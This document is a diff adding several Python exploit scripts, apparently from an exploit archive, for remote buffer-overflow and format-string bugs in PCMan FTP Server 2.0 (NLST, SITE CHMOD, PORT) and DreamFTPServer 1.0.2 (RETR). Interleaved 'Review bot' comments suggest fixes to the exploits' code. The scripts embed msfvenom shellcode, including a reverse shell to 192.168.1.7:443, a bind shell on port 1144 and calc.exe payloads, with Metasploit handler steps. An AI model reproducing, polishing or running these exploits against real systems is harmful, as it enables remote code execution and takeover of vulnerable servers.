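+"\x2f\x3d\xb1\x22\x17\x85\x6e\x97\x96\x04\xe2\xa3\xbc\x16\x3a"
+"\x2b\xf9\x42\x92\x7a\x57\x3c\x54\xd5\x19\x96\x0e\x8a\xf3\x7e"
+"\xd6\xe0\xc3\xf8\xd7\x2c\xb2\xe4\x66\x99\x83\x1b\x46\x4d\x04"
+"\x64\xba\xed\xeb\xbf\x7e\x1d\xa6\x9d\xd7\xb6\x6f\x74\x6a\xdb"
+"\x8f\xa3\xa9\xe2\x13\x41\x52\x11\x0b\x20\x57\x5d\x8b\xd9\x25"
+"\xce\x7e\xdd\x9a\xef\xaa")
+
+buffer= '\x90'*30 + shellcode
+buffer1= '\x41' * 2007 + ret + buffer + '\x43'*(696-len(buffer))
+print "Sending..."
+
+s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connect=s.connect(('192.168.1.43',21))
+s.recv(1024)
+s.send('USER anonymous\r\n')
+s.recv(1024)
+s.send('PASS \r\n')
+s.recv(1024)
+s.send('NLST' + buffer1 + '\r\n')
+s.close()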
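Review bot: The only description of the `shellcode` bytes is the comment `#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.7 LPORT=443 ...`, so the author's lab callback address is presumably baked into the opaque blob, while the script itself connects to a different hard-coded host, `192.168.1.43`. Nothing next to the blob says this, so someone reproducing the issue in a lab cannot tell from the listing where the affected host will try to connect, or what outbound traffic to look for. I would add above `shellcode=(`: `# payload (per the msfvenom line above, bytes not verified here): reverse shell to 192.168.1.7:443`.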
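--- a/platforms/windows/remote/40713.py
+++ b/platforms/windows/remote/40713.py
@@ -0,0 +1,45 @@
+#!/usr/bin/env python
+#-*- coding: utf-8 -*-
+
+# Exploit Title: PCMan FTP Server 2.0 BoF SITE CHMOD Command
+# Date: 04/11/2016
+# Exploit Author: Luis Noriega
+# Tested on: Windows XP Profesional V. 5.1 Service Pack 3
+# CVE : n/a
+
+import socket
+
+# shellcode with metasploit:
+# msfvenom -p windows/exec CMD=calc.exe -b'\x00\x0A\x0D' -f c
+
+ret = "\xD7\x30\x6B\x7E" #SHELL32.dll
+
+shellcode = ("\xdb\xd6\xbf\x70\x7b\xf3\x98\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
+"\x31\x31\x7a\x18\x03\x7a\x18\x83\xc2\x74\x99\x06\x64\x9c\xdf"
+"\xe9\x95\x5c\x80\x60\x70\x6d\x80\x17\xf0\xdd\x30\x53\x54\xd1"
+"\xbb\x31\x4d\x62\xc9\x9d\x62\xc3\x64\xf8\x4d\xd4\xd5\x38\xcf"
+"\x56\x24\x6d\x2f\x67\xe7\x60\x2e\xa0\x1a\x88\x62\x79\x50\x3f"
+"\x93\x0e\x2c\xfc\x18\x5c\xa0\x84\xfd\x14\xc3\xa5\x53\x2f\x9a"
+"\x65\x55\xfc\x96\x2f\x4d\xe1\x93\xe6\xe6\xd1\x68\xf9\x2e\x28"
+"\x90\x56\x0f\x85\x63\xa6\x57\x21\x9c\xdd\xa1\x52\x21\xe6\x75"
+"\x29\xfd\x63\x6e\x89\x76\xd3\x4a\x28\x5a\x82\x19\x26\x17\xc0"
+"\x46\x2a\xa6\x05\xfd\x56\x23\xa8\xd2\xdf\x77\x8f\xf6\x84\x2c"
+"\xae\xaf\x60\x82\xcf\xb0\xcb\x7b\x6a\xba\xe1\x68\x07\xe1\x6f"
+"\x6e\x95\x9f\xdd\x70\xa5\x9f\x71\x19\x94\x14\x1e\x5e\x29\xff"
+"\x5b\x90\x63\xa2\xcd\x39\x2a\x36\x4c\x24\xcd\xec\x92\x51\x4e"
+"\x05\x6a\xa6\x4e\x6c\x6f\xe2\xc8\x9c\x1d\x7b\xbd\xa2\xb2\x7c"
+"\x94\xc0\x55\xef\x74\x29\xf0\x97\x1f\x35")
+
+buffer = '\x90'*30 + shellcode
+buffer2 = '\x41' * 2001 + ret + buffer + '\x43'*(749-len(buffer))
+print "Sending Buffer"
+
+s = socket.socket(socket.AF_INET, socket. SOCK_STREAM)
+connect = s.connect(('192.168.1.150', 21))
+s.recv(1024)
+s.send('USER anonymous\r\n')
+s.recv(1024)
+s.send('PASS anonymous\r\n')
+s.recv(1024)
+s.send('SITE CHMOD' + buffer2 + '\r\n')
+s.close()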
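--- a/platforms/windows/remote/40714.py
+++ b/platforms/windows/remote/40714.py
@@ -0,0 +1,74 @@
+#!/usr/bin/env python
+#-*- coding: utf-8 -*-
+
+# Exploit Title: PCMan FTP Server 2.0 PORT Command BoF Exploit
+# Author: Pablo González
+# Date: 4/11/2016
+# Software: PCMan 2.0
+# Tested on: Windows XP Profesional SP3 Spanish x86
+
+import socket
+
+print "Creating malicious input!"
+
+junk = '\x41'*2007
+ret="\xf7\x56\x3c\x7e" #User32.dll 7E3C56F7
+nops = '\x90'*20
+
+#msfvenom -p windows/shell_bind_tcp LPORT=1144 -b '\x0a\x00\x0d' -f c
+#put shellcode in variable 'sc'
+
+sc=("\xdb\xd6\xba\xd3\x95\x1b\xd0\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
+"\x53\x31\x50\x17\x83\xe8\xfc\x03\x83\x86\xf9\x25\xdf\x41\x7f"
+"\xc5\x1f\x92\xe0\x4f\xfa\xa3\x20\x2b\x8f\x94\x90\x3f\xdd\x18"
+"\x5a\x6d\xf5\xab\x2e\xba\xfa\x1c\x84\x9c\x35\x9c\xb5\xdd\x54"
+"\x1e\xc4\x31\xb6\x1f\x07\x44\xb7\x58\x7a\xa5\xe5\x31\xf0\x18"
+"\x19\x35\x4c\xa1\x92\x05\x40\xa1\x47\xdd\x63\x80\xd6\x55\x3a"
+"\x02\xd9\xba\x36\x0b\xc1\xdf\x73\xc5\x7a\x2b\x0f\xd4\xaa\x65"
+"\xf0\x7b\x93\x49\x03\x85\xd4\x6e\xfc\xf0\x2c\x8d\x81\x02\xeb"
+"\xef\x5d\x86\xef\x48\x15\x30\xcb\x69\xfa\xa7\x98\x66\xb7\xac"
+"\xc6\x6a\x46\x60\x7d\x96\xc3\x87\x51\x1e\x97\xa3\x75\x7a\x43"
+"\xcd\x2c\x26\x22\xf2\x2e\x89\x9b\x56\x25\x24\xcf\xea\x64\x21"
+"\x3c\xc7\x96\xb1\x2a\x50\xe5\x83\xf5\xca\x61\xa8\x7e\xd5\x76"
+"\xcf\x54\xa1\xe8\x2e\x57\xd2\x21\xf5\x03\x82\x59\xdc\x2b\x49"
+"\x99\xe1\xf9\xe4\x91\x44\x52\x1b\x5c\x36\x02\x9b\xce\xdf\x48"
+"\x14\x31\xff\x72\xfe\x5a\x68\x8f\x01\x60\x11\x06\xe7\x02\xf1"
+"\x4e\xbf\xba\x33\xb5\x08\x5d\x4b\x9f\x20\xc9\x04\xc9\xf7\xf6"
+"\x94\xdf\x5f\x60\x1f\x0c\x64\x91\x20\x19\xcc\xc6\xb7\xd7\x9d"
+"\xa5\x26\xe7\xb7\x5d\xca\x7a\x5c\x9d\x85\x66\xcb\xca\xc2\x59"
+"\x02\x9e\xfe\xc0\xbc\xbc\x02\x94\x87\x04\xd9\x65\x09\x85\xac"
+"\xd2\x2d\x95\x68\xda\x69\xc1\x24\x8d\x27\xbf\x82\x67\x86\x69"
+"\x5d\xdb\x40\xfd\x18\x17\x53\x7b\x25\x72\x25\x63\x94\x2b\x70"
+"\x9c\x19\xbc\x74\xe5\x47\x5c\x7a\x3c\xcc\x6c\x31\x1c\x65\xe5"
+"\x9c\xf5\x37\x68\x1f\x20\x7b\x95\x9c\xc0\x04\x62\xbc\xa1\x01"
+"\x2e\x7a\x5a\x78\x3f\xef\x5c\x2f\x40\x3a")
+
+buffer= junk + ret + nops + sc
+
+s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ip = raw_input('Give me Remote IP Address:')
+connect=s.connect((ip,21))
+banner = s.recv(1024)
+print banner
+s.send('USER anonymous\r\n')
+s.recv(1024)
+s.send('PASS\r\n')
+s.recv(1024)
+#Sending input PORT command (Exploitation is coming)
+s.send('PORT' + buffer + '\r\n')
+s.close()
+
+#Metasploit exploit/multi/handler or nc <ip> <port> :D
+#
+# For exploit/multi/handler
+#
+# use exploit/multi/handler
+# set PAYLOAD windows/shell_bind_tcp
+# set RHOST <ip>
+# set LPORT 1144
+# exploit
+# ...
+# Got it!
+
+print "Got it? :D"
+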
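Review bot: The final `print "Got it? :D"` runs unconditionally after `s.close()`, so the script prints the same closing line whether or not the server was affected. The replies to `USER` and `PASS` are read with `s.recv(1024)` and discarded, and nothing is read after the `PORT` line. For anyone using this entry to confirm that a host is patched, that output is misleading. I would change it to a neutral status such as `print "PORT line sent; outcome not verified"`. 40715.py has the same problem in a stronger form: it prints `Successfull Exploitation!` before `s.send(message)` is even called.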
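--- a/platforms/windows/remote/40715.py
+++ b/platforms/windows/remote/40715.py
@@ -0,0 +1,58 @@
+import socket
+import os
+import sys
+
+print '''
+
+##############################################
+# Created: ScrR1pTK1dd13 #
+# Name: Greg Priest #
+# Mail: ScrR1pTK1dd13.slammer@gmail.com #
+##############################################
+
+# Exploit Title: DreamFTPServer1.0.2_RETR_command_format_string_remotecodevuln
+# Date: 2016.11.04
+# Exploit Author: Greg Priest
+# Version: DreamFTPServer1.0.2
+# Tested on: Windows7 x64 HUN/ENG Professional
+'''
+
+ip = raw_input("Target ip: ")
+port = 21
+overflow = '%8x%8x%8x%8x%8x%8x%8x%8x%341901071x%n%8x%8x%24954x%n%x%x%x%n'
+nop = '\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
+#overflow = '%8x%8x%8x%8x%8x%8x%8x%8x%341901090x%n%8x%8x%24954x%n%x%x%x%n\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
+
+#shellcode calc.exe
+shellcode =(
+"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" +
+"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
+"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
+"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
+"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
+"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
+"\x45\x81\x3e\x43\x72\x65\x61\x75" +
+"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
+"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
+"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
+"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
+"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
+"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
+"\x53\x53\x53\x53\x52\x53\xff\xd7")
+
+remotecode = overflow + nop + shellcode + '\r\n'
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+connect=s.connect((ip ,port))
+s.recv(1024)
+s.send('USER anonymous\r\n')
+s.recv(1024)
+s.send('PASSW hacker@hacker.net\r\n')
+s.recv(1024)
+print remotecode
+print '''
+Successfull Exploitation!
+'''
+message = 'RETR ' + remotecode
+s.send(message)
+s.recv(1024)
+s.close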
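Review bot: The last line, `s.close`, only references the method without calling it, so the socket is never closed explicitly; it should read `s.close()`. `import os` and `import sys` at the top are not used anywhere in the file and can be dropped. `print remotecode` writes the raw request, including non-printable bytes, straight to the terminal, which can garble it; `print repr(remotecode)` shows the same content safely.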